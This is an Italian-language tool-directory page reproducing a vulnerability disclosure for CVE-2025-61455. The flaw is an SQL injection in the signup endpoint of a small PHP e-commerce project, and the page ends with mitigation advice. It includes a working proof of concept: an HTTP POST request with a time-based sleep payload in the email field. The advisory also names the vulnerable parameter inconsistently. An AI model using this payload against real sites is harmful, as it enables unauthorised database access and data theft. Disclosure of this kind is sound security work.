Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61455 — Divulgazione pubblica e proof-of-concept per CVE-2025-61455, un'iniezione SQL critica in E-commerce Project v1.0, inclusi dettagli tecnici, PoC e raccomandazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/tansique-17/cve-2025-61455
Analisi delle VulnerabilitàExploitSicurezza WebApprendimento e FormazioneRisorse Curate
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgazione pubblica e proof-of-concept per CVE-2025-61455, un'iniezione SQL critica in E-commerce Project v1.0, inclusi dettagli tecnici, PoC e raccomandazioni di mitigazione.

Vedi Repository
10 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Divulgazione CVE: CVE-2025-61455 — SQL Injection in Progetto E-commerce

Data di divulgazione: 14 ottobre 2025
ID CVE: CVE-2025-61455
Gravità: CRITICA (CVSS 9.8)


🧩 Riepilogo

Una vulnerabilità critica di SQL Injection esiste in E-commerce Project v1.0, in particolare nell'endpoint signup.inc.php. L'applicazione incorpora direttamente input utente non sanificati nelle query SQL, consentendo ad attaccanti non autenticati di bypassare l'autenticazione ed eseguire comandi SQL arbitrari.

A questo problema è stato assegnato l'identificatore CVE-2025-61455. Al momento della divulgazione pubblica, nessuna patch ufficiale era disponibile.


📦 Prodotto interessato

  • Vendor: Indipendente (Bhabishya-123)
  • Progetto: E-commerce
  • Versione: v1.0
  • File: signup.inc.php
  • Endpoint vulnerabile:
    https://localhost/e-commerce-main/includes/signup.inc.php

  • 🔬 Dettagli della vulnerabilità

    L'applicazione utilizza input non sanificati direttamente nelle query SQL senza alcuna validazione dell'input o prepared statement. La vulnerabilità esiste nel parametro aid del file signup.inc.php.

    Un attaccante può iniettare codice SQL dannoso tramite il parametro email, consentendo attacchi di SQL injection blind basati sul tempo.

    Esempio di pattern di codice vulnerabile:

    root@kitploit:~
    $query = "SELECT * FROM table WHERE email='$email'";
    

    Ciò consente payload di iniezione in grado di manipolare la logica delle query ed estrarre dati sensibili.


    📌 Classificazione CWE

    ID CWETitolo
    CWE-89Neutralizzazione impropria di elementi speciali utilizzati in un comando SQL

    📊 Punteggio CVSS v3.1

    PunteggioGravitàStringa del vettore
    9.8CRITICACVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    💥 Impatto

    Uno sfruttamento riuscito potrebbe comportare:

    • ✅ Bypass completo dell'autenticazione
    • 🔓 Accesso non autorizzato a funzionalità privilegiate
    • 📊 Esfiltrazione di dati tramite SQL injection blind basata sul tempo
    • 🛠️ Potenziale manipolazione o cancellazione di dati
    • ⚠️ Compromissione completa del database backend
    • 💻 Potenziale esecuzione di codice remoto

    🧪 Proof of Concept (PoC)

    1. Clonare il repository

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Hosting locale

    Utilizzare XAMPP/LAMP per distribuire il progetto e navigare su:

    root@kitploit:~
    http://localhost/e-commerce-main/includes/signup.inc.php
    

    3. Iniezione del payload

    Inviare la seguente richiesta HTTP dannosa:

    root@kitploit:~
    POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
    

    Spiegazione:
    Il parametro email contiene un payload di SQL injection basato sul tempo: '+(select*from(select(sleep(20)))a)+'

    Se l'applicazione ritarda la risposta di 20 secondi, l'iniezione SQL ha avuto successo.


    🔐 Raccomandazioni

    • ✅ Sostituire le query SQL dinamiche con prepared statement (mysqli_prepare() o PDO).
    • 🔍 Eseguire validazione e sanificazione dell'input per tutti gli input utente.
    • 🧱 Distribuire un Web Application Firewall (WAF) per bloccare pattern noti di SQL injection.
    • 🛡️ Condurre audit regolari del codice e test di penetrazione per una rilevazione precoce.
    • 🔒 Implementare query parametrizzate per tutte le interazioni con il database.
    • 📝 Utilizzare allowlist per la validazione dell'input dove possibile.

    📆 Cronologia

    EventoData
    Vulnerabilità scoperta16 settembre 2025
    Divulgazione pubblica13 ottobre 2025
    Patch disponibile❌ Non disponibile al momento della divulgazione

    🙋‍♂️ Crediti

    Questa vulnerabilità è stata scoperta e divulgata in modo responsabile da:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Riferimenti

    • OWASP - SQL Injection
    • PortSwigger - SQL Injection
    • CVE-2025-61455 su CVE.org

    💬 Questo advisory è pubblicato in modo indipendente a causa della mancanza di risposta da parte del vendor.

    Scarica lo strumento